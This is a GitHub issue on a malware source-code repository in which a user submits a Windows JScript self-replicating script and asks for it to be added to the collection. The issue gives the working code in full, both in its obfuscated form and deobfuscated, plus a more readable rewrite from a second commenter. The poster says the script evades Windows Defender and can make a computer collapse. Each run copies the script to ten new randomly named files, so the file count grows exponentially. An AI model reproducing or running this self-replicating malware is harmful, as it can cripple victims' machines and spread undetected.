search

vxunderground / MalwareSourceCode

Collection of malware source code for a variety of platforms in an array of different programming languages.
https://vx-underground.org
15.64k stars 1.74k forks source link

JS worm that can duplicate it self #72

Closed theanonhackuk closed 1 year ago

theanonhackuk commented 1 year ago

Really cute worm i found somewhere on the internet that only have 10 lines of code and it can actually make your computer to collapse in some seconds/minutes. Its written in windows JS code, seems that windows deffender dont detect it as malicious.

https://antiscan.me/scan/new/result?id=xoY5kGYacDYc

Obfuscated

This is the original one, it was like this the file

var _0x21b404=_0x27ee;(function(_0x263738,_0x19aac1){var _0x489d59=_0x27ee,_0x3747ec=_0x263738();while(!![]){try{var _0x1babdd=-parseInt(_0x489d59(0xfb))/0x1+parseInt(_0x489d59(0xfd))/0x2*(-parseInt(_0x489d59(0x102))/0x3)+-parseInt(_0x489d59(0xfc))/0x4*(parseInt(_0x489d59(0xfe))/0x5)+-parseInt(_0x489d59(0x101))/0x6*(-parseInt(_0x489d59(0x100))/0x7)+-parseInt(_0x489d59(0xf1))/0x8*(parseInt(_0x489d59(0xfa))/0x9)+parseInt(_0x489d59(0xf3))/0xa*(-parseInt(_0x489d59(0xf4))/0xb)+parseInt(_0x489d59(0xf6))/0xc*(parseInt(_0x489d59(0xf5))/0xd);if(_0x1babdd===_0x19aac1)break;else _0x3747ec['push'](_0x3747ec['shift']());}catch(_0x4f8d9a){_0x3747ec['push'](_0x3747ec['shift']());}}}(_0x24f1,0xb64b5));function _0x27ee(_0x5d8d9a,_0x27d6ef){var _0x24f114=_0x24f1();return _0x27ee=function(_0x27eef3,_0x17e0fe){_0x27eef3=_0x27eef3-0xef;var _0x430cfa=_0x24f114[_0x27eef3];return _0x430cfa;},_0x27ee(_0x5d8d9a,_0x27d6ef);}var awdnkfkwebjvlvdsjlehwrivfdsklmldkvsnkl=new ActiveXObject('Scripting.FileSystemObject'),fwewvbehfegfihgqwygckwvekcweghro7937rfiv=WScript[_0x21b404(0xf8)],a=0x0;function _0x24f1(){var _0x4a6c82=['44uwTaAy','365446hltTMr','397075lwjJMr','.js','35NdOfwW','1229730Aouzid','3CIsJDR','random','CopyFile','8FrUkTc','toString','3266230MVNAHW','22EwijlE','78GauFNK','5666844puiVNb','ka00m','ScriptFullName','FileExists','859482VhFsdV','1306488WyGrVl'];_0x24f1=function(){return _0x4a6c82;};return _0x24f1();}while(a<0xa){a=a+0x1;var dwanjkvlewlkjdbswlahd=_0x21b404(0xf7)+Math[_0x21b404(0xef)]()[_0x21b404(0xf2)]()['replace']('.','')+_0x21b404(0xff);!awdnkfkwebjvlvdsjlehwrivfdsklmldkvsnkl[_0x21b404(0xf9)](dwanjkvlewlkjdbswlahd)&&awdnkfkwebjvlvdsjlehwrivfdsklmldkvsnkl[_0x21b404(0xf0)](fwewvbehfegfihgqwygckwvekcweghro7937rfiv,dwanjkvlewlkjdbswlahd);}

Deobfuscated

Its named kaoom.js the file.

var awdnkfkwebjvlvdsjlehwrivfdsklmldkvsnkl = new ActiveXObject("Scripting.FileSystemObject");  // maybe the file manager function
var fwewvbehfegfihgqwygckwvekcweghro7937rfiv = WScript.ScriptFullName;  // Some random variable names
var a = 0;             // Starts from 0
while (a < 10) {    // Seems like a counter
    a = a + 1;
    var dwanjkvlewlkjdbswlahd = "ka00m" + Math.random().toString().replace(".", "") + ".js";       //
    if (!awdnkfkwebjvlvdsjlehwrivfdsklmldkvsnkl.FileExists(dwanjkvlewlkjdbswlahd )) {
        awdnkfkwebjvlvdsjlehwrivfdsklmldkvsnkl.CopyFile(fwewvbehfegfihgqwygckwvekcweghro7937rfiv, dwanjkvlewlkjdbswlahd );
    }
}

Result

image

Note

I think this isn't like a very advanced script that someone may massivly spread. I will just left it here if you want to add it to your repo.

DartPower commented 1 year ago 
var XFileSys = new ActiveXObject("Scripting.FileSystemObject");  // maybe the file manager function
var XScriptName = WScript.ScriptFullName;  // Some random variable names
var a = 0;             // Starts from 0
while (a < 10) {    // Seems like a counter
    a = a + 1;
    var XFile = "ka00m" + Math.random().toString().replace(".", "") + ".js";       //
    if (!XFileSys.FileExists(XFile )) {
        XFileSys.CopyFile(XScriptName, XFile );
    }
}

More readable deobfuscated file

vxunderground commented 1 year ago

+